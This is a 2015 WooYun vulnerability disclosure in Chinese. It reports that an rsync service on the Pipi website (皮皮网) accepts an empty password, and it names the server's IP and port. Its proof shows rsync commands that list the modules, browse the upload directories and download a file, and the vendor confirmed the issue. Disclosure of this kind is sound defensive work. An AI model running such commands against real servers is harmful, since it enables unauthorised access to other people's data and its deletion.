当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0100942

漏洞标题:皮皮网某系统服务配置不当可导致在线资源被清空风险

相关厂商:皮皮网

漏洞作者: 路人甲

提交时间:2015-03-12 15:59

修复时间:2015-04-26 16:00

公开时间:2015-04-26 16:00

漏洞类型:服务弱口令

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-12: 细节已通知厂商并且等待厂商处理中
2015-03-12: 厂商已经确认,细节仅向厂商公开
2015-03-22: 细节向核心白帽子及相关领域专家公开
2015-04-01: 细节向普通白帽子公开
2015-04-11: 细节向实习白帽子公开
2015-04-26: 细节向公众公开

简要描述:

皮皮网某系统服务配置不当可导致在线资源被清空风险

详细说明:

rsync服务空口令,可删除所有线上资源
60.190.172.90:873
http://img.pipi.cn/imgupload/clientwww3/201502/03/20150203162921_744.jpg

[root@localhost tmp]# rsync 60.190.172.90::pipi_img/imgupload/clientwww3/201502/03/20150203162921_744.jpg -av
receiving file list ... done
-rw-r--r-- 4875 2015/02/03 16:29:21 20150203162921_744.jpg
sent 133 bytes received 115 bytes 165.33 bytes/sec
total size is 4875 speedup is 19.66


漏洞证明:

[root@localhost tmp]# rsync 60.190.172.90::
pipi_img
ppfilm_upload
pipi_ent_img
pipi_model_img
pipi_show_img
pipi_juhe_img_126X168
pipi_juhe_img_300X400
pipi_juhe_img_85X110
[root@localhost tmp]# rsync 60.190.172.90::ppfilm_upload
drwxr-xr-x 4096 2014/02/27 12:42:21 .
-rw-r--r-- 8 2013/10/28 12:32:32 a.html
drwxr-xr-x 4096 2007/01/11 10:20:47 WEB-INF
drwxr-xr-x 12288 2015/03/08 00:01:06 logs
drwxr-xr-x 4096 2013/12/04 16:12:40 minipic
drwxr-xr-x 233472 2015/03/02 16:25:25 moviebigpic
drwxr-xr-x 479232 2015/03/02 16:25:25 moviepic
drwxr-xr-x 4096 2010/01/20 13:21:17 pubimgs
drwxr-xr-x 4096 2011/07/11 10:39:39 upic
drwxr-xr-x 4096 2007/01/11 10:20:47 webapps
[root@localhost tmp]# rsync 60.190.172.90::ppfilm_upload/webapps
drwxr-xr-x 4096 2007/01/11 10:20:47 webapps

修复方案:

禁止互联网访问

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-03-12 20:34

厂商回复:

感谢感谢!

最新状态:

暂无